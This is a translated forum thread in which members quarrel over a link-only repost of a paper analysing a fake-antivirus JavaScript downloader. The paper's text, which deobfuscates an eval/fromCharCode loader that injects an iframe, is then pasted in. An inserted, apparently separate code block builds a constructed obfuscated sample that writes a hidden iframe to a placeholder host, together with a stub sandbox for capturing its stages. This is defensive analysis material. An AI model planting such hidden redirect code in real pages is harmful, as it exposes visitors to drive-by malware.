
Analysis Of Fake Antivirus Malware Delivery



1. Thanks for the sample file(s)

2. First view

3. Second view

4. More

Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf

WTF man ... I'm starting to agree with those who say you post just to get attention. What kind of crap topic is this, with 4 lines in it?

At least put some basic intel about the subject you're presenting; what you did here is a joke, as far as I can see.

No offence, but this is too much.

It's as if a news item about potatoes with cheese came out and instead of telling you about it here, I made a topic with:

1. Go to google.ro

2. Type "potatoes with cheese"

3. Read the news item on timpul.md.


Edited by AGSQ


@AGSQ by the way, if you had read the article you would have seen it isn't a news item :) + it's a .PDF document, I wasn't going to sit and take screenshots just so you could read the article on rst without clicking the link. (Try not to post just for the sake of it.)

Edited by Aerosol

@AGSQ I posted the link for whoever is interested.

If you're not interested, please don't comment.


Man, are you dense?

The point of posting something, of sharing something with the forum users, is to give them as much information as possible about that thing.

Was it that hard to copy-paste what's in that PDF and then lay out the post nicely with the respective images?

Don't take it personally, at the end of the day I have nothing against you, you could drop dead tomorrow and I wouldn't start crying over you, but the point was that you make pointless posts just to get the count up.

Offer information if you have any to offer; if not, refrain. It's quite ugly and annoying, especially for those of us who have RSS active.

PS: A pretty good joke:



1. Thanks for the sample file(s)

After writing my last article about malware analysis for Android[1], I decided to check some threats that may come from webpages. Today we can see more advertisements on the web than a few years ago. In the case of malicious pages, the "advertisements" added there now will more often than not try to steal your data by installing some malware on your computer or by redirecting you to a webpage containing exploit code for your browser (or its plugin).

A few nice examples of 'webpages' like this I found (again) on Mila's great blog[0]. Thanks again! ;)

(Hint: Don't ask me for the password. Ask Mila via email.)

Let's check the first archive, with an HTML file, named "FakeAV Downloader".

2. First View

After unpacking our HTML sample, we can see that the index.html file contains HTML and JavaScript code:

Let's copy the JavaScript code to a new file, and save it as "ob1.html". Now we can clean the code a little bit to see what is going on here:

As you can see, the JS code is preparing "eval()" and "fromCharCode()" to use later (with "n"):

3. Second view

When I was trying to figure out how to deobfuscate this code, I found a link to a very nice tool called JSDetox[2]. You can install it on Kali[4], but if there is any problem with installation by "bundler", try to install each package manually (gem). It should help.

After uploading our sample index.html to JSDetox, we can start deobfuscation ("Analyse") and get the results in few

Now we can see where the newly created <iframe> tag is trying to relocate us – the iframe page is located on:

Unfortunately, when I was checking this code, the RU hostname was unavailable.

After that, I found some other interesting information, for example:

a) Correlation network topology[3]

b) This host was used for: [5]

c) and one more piece of information:

So it seems now that we have all the information we need to decide that this index.html file (used in a phishing campaign, for example) can be very dangerous for the safety of our users/clients.

4. More

Again, big thanks for the sample files! ;)

If you have more, post the link(s) in the comments or send me an email with the subject "MALWARE". Please remember to pack it with the password 'infected' (zip/rar/whatever). (Without the password, the email server will drop them.)

Materials described here:


Especially for Mr. @AGSQ, who couldn't click a link.

I'm sorry, sir, that I took the liberty of posting the link to save 5 minutes of taking screenshots + another 10 of editing...

I hope you now understand this article better (though I doubt you understood it. :)) )

Edited by Aerosol

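The deobfuscation step in the article (eval() fed by a string rebuilt with fromCharCode, ending in an injected iframe) can be reproduced in a triage harness without letting the dropper run. The block below is an added example, not code from the paper or from JSDetox: it executes a constructed sample under Node.js with eval, document and location replaced by recorders, so each decoded stage and the iframe target are captured rather than executed. The sample string, the host malicious.invalid and the function names captureStages/extractUrls are all constructed for this illustration.

```javascript
// Added example, not code from the paper or from JSDetox. Assumes Node.js;
// "document", "location" and "window" are stub objects defined below.

// Constructed sample, NOT the article's index.html. Stage 1 rebuilds a string
// from char codes with String.fromCharCode and evals it; stage 2 writes an
// iframe pointing at a placeholder host (.invalid is a reserved TLD).
const STAGE2 = "document.write('<iframe src=\"http://malicious.invalid/land.php\" width=1 height=1></iframe>');";
const SAMPLE =
  'var c = [' + Array.from(STAGE2, ch => ch.charCodeAt(0)).join(',') + '];' +
  'var n = ""; for (var i = 0; i < c.length; i++) { n += String.fromCharCode(c[i]); }' +
  'eval(n);';

// Runs untrusted JS with eval, document and location replaced by recorders.
// Every string handed to eval() is stored as a stage and then analysed the
// same way, so multi-stage packers unwrap layer by layer up to maxDepth.
function captureStages(code, maxDepth = 5) {
  const stages = [];  // decoded source of each stage, outermost first
  const sinks = [];   // document.write() HTML, location.href sets, errors
  const run = (src, depth) => {
    if (depth > maxDepth) { sinks.push('max depth reached'); return; }
    stages.push(src);
    const fakeEval = (s) => { run(String(s), depth + 1); };
    const fakeDocument = { write: (html) => { sinks.push(String(html)); } };
    const fakeLocation = { set href(u) { sinks.push('location: ' + u); } };
    // A parameter named "eval" shadows the global inside a sloppy-mode Function
    // body, so eval(n) in the sample calls our recorder rather than real eval.
    // Limitation: window.eval, this.eval or new Function() would bypass this.
    try {
      const runner = new Function('eval', 'document', 'location', 'window', src);
      runner(fakeEval, fakeDocument, fakeLocation, { location: fakeLocation });
    } catch (e) { sinks.push('error: ' + e.message); }
  };
  run(code, 0);
  return { stages, sinks };
}

// Pulls src/href URLs out of captured HTML, e.g. for blocklists or proxy logs.
function extractUrls(sinks) {
  const urls = [];
  const re = /\b(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
  for (const s of sinks) {
    let m;
    while ((m = re.exec(s)) !== null) urls.push(m[1]);
  }
  return urls;
}

const report = captureStages(SAMPLE);
console.log(report.stages.length, 'stages; iframe targets:', extractUrls(report.sinks));  // 2 stages; [ 'http://malicious.invalid/land.php' ]
```

The recorded stages are what JSDetox shows after "Analyse"; the URL list is what a defender would feed to a blocklist or search for in proxy logs.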

It's not about saving time but about helping the community. Both existing members and new ones, who have a better chance of finding the forum from a 500-word tag cloud than from 10 words.

Last reply.
